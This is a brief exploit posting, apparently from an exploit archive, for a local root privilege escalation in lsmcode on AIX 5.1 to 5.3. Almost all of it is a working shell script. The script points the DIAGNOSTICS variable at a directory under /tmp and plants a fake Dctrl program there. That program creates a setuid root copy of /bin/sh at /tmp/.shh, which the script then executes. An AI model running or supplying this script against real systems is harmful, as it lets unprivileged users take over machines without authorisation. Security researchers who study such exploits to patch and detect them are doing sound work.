Local root command execution exploit for lsmcode on AIX 5.1 to 5.3.
f5cc29c4fb8cdca062ee8c5e01582bb164ea0a05f38739d127cee434d942da65
mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh